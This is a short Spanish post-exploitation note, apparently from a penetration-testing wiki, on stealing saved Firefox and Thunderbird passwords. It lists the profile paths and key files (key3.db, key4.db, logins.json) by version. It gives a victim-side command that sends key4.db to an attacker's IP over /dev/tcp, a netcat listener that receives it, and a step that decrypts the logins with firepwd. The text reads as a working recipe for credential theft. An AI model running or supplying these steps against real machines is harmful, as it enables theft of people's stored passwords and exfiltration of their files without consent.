Post-Explotación
Mozilla
Si por ejemplo nos encontraramos en el /home de un usuario una carpeta .mozilla y es el caso de que nos encontramos un los archivos estos archivos:
Para encontrar la ruta en Windows puede por ejemplo en -->
C:\Users\<user>\AppData\Roaming\Mozilla\Firefox\ProfilesFirefox <32 (key3.db, signons.sqlite)
Firefox >=32 (key3.db, logins.json)
Firefox >=58.0.2 (key4.db, logins.json)
Firefox >=75.0 (sha1 pbkdf2 sha256 aes256 cbc used by key4.db, logins.json)
at least Thunderbird 68.7.0, likely other versionsPodríamos utilizar la herramienta firepwd la cuál es una herramienta que se escribió para ilustrar cómo se protegen las contraseñas de Mozilla (Firefox, Thunderbird). utilizando el contenido de los archivos key4.db (o key3.db), logins.json (o signons.sqlite).

Una vez tengamos estos 2 archivos, tenemos que pasárnoslo a nuestra máquina:
Victima
cat < key4.db > /dev/tcp/nuestra-IP/<PUERTO>Local
nc -lvnp <PUERTO> > key4.dbAhora solamente deberíamos descargarnos la herramienta y ejecutarla
Tienes que poner los 2 archivos en la misma localización donde ejecutas
python3 firepwd.pyEjemplo

Last updated